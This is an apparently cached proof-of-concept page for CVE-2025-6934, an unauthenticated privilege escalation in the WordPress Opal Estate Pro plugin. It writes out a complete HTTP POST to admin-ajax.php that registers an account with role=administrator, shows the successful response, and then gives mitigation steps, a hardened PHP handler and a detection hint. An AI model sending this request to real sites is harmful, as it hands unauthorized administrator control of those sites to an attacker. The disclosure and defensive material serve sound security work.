POC details: 035fc035de2d1fbabad708b40ab16b2cc403ae5c

Source
Related vulnerability
Title: WordPress plugin Opal Estate Pro security vulnerability (CVE-2025-6934)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host personal blog sites on servers running PHP and MySQL. A WordPress plugin is an application extension. WordPress plugin Opal Estate Pro 1.7.5 and earlier contain a security vulnerability: the on_regiser_user function lacks a role restriction, which may lead to privilege escalation.
Description
CVE-2025-6934 POC
Introduction
# 🚨 WordPress OpalEstate Plugin - Unauthenticated Privilege Escalation Vulnerability

## 🔎 Description
The **OpalEstate** plugin for WordPress contains a critical vulnerability in its AJAX registration handler, allowing **unauthenticated users to register as administrators**.

The issue lies in the insecure handling of the `role` parameter in the `opalestate_register_form` AJAX action, which is exposed publicly via `admin-ajax.php`. The nonce only ties the request to the registration form; it is not an authorization check. An attacker holding a valid nonce can therefore escalate privileges by submitting the `role=administrator` field, resulting in full site compromise.

- **CVE ID:** CVE-2025-6934
- **CVSS Score:** 9.8 (Critical)
- **Published:** June 30, 2025

## 📋 Vulnerable Endpoint / POC

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 231
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wordpress/?page_id=16
Accept-Encoding: gzip, deflate, br
Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt
Connection: keep-alive

username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form
```

## Response

```http
HTTP/1.1 200 OK
Date: Wed, 02 Jul 2025 14:19:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Pragma: no-cache
Content-Length: 53
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8

{"status":true,"redirect":"\/wordpress\/?page_id=16"}
```

## Impact
- Full WordPress site takeover
- Unauthenticated admin account creation
- Persistent backdoor access
- Potential for privilege chaining and plugin/theme exploitation

## 🛡️ Mitigation
- Remove or sanitize the `role` parameter from user-controlled input.
- Force role assignment server-side (e.g., subscriber only).
- Use `wp_insert_user()` or `wp_create_user()` with locked roles.
- Validate user capabilities before processing sensitive actions.
- Patch the plugin or disable AJAX registration if not essential.
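The mitigation above, as an added illustrative example of a hardened AJAX registration handler. This is not the plugin's code; the action name `example_register_form`, the handler name and the nonce name are assumptions, while the WordPress functions used are real core APIs. The key point is that the role is never read from the request.

```php
<?php
// Added example (not the plugin's code): hardened AJAX registration handler.
// The action and nonce names are assumptions; the WordPress APIs are real.
add_action( 'wp_ajax_nopriv_example_register_form', 'example_register_form_handler' );
add_action( 'wp_ajax_example_register_form', 'example_register_form_handler' );

function example_register_form_handler() {
    // A nonce proves the request came from the form; it is not an authorization check.
    check_ajax_referer( 'example-register-nonce', 'example-register-nonce' );

    // Respect the site-wide "Anyone can register" setting.
    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( array( 'message' => 'Registration is disabled.' ), 403 );
    }

    // Sanitise the fields the handler actually needs.
    // A client-supplied "role" field is deliberately never read.
    $username = isset( $_POST['username'] ) ? sanitize_user( wp_unslash( $_POST['username'] ), true ) : '';
    $email    = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    $password = isset( $_POST['password'] ) ? (string) wp_unslash( $_POST['password'] ) : '';

    if ( '' === $username || ! is_email( $email ) || strlen( $password ) < 12 ) {
        wp_send_json_error( array( 'message' => 'Invalid registration data.' ), 400 );
    }

    // Role is fixed server-side: the site default, constrained to an allow-list
    // so that a misconfigured default_role can never grant a privileged role here.
    $allowed_roles = array( 'subscriber' );
    $role          = get_option( 'default_role', 'subscriber' );
    if ( ! in_array( $role, $allowed_roles, true ) ) {
        $role = 'subscriber';
    }

    $user_id = wp_insert_user( array(
        'user_login' => $username,
        'user_email' => $email,
        'user_pass'  => $password,
        'role'       => $role,
    ) );

    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
    }

    wp_send_json_success( array( 'redirect' => home_url( '/' ) ) );
}
```

For detection, a `POST` to `admin-ajax.php` whose body carries both `action=opalestate_register_form` and a `role=` field is a direct indicator of attempts against this flaw and is worth alerting on in web server or WAF logs.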

## BY MRJ HAXCORE
File snapshot

[4.0K] /data/pocs/035fc035de2d1fbabad708b40ab16b2cc403ae5c └── [2.7K] README.md 0 directories, 1 file
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the POC through the source first.
    2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.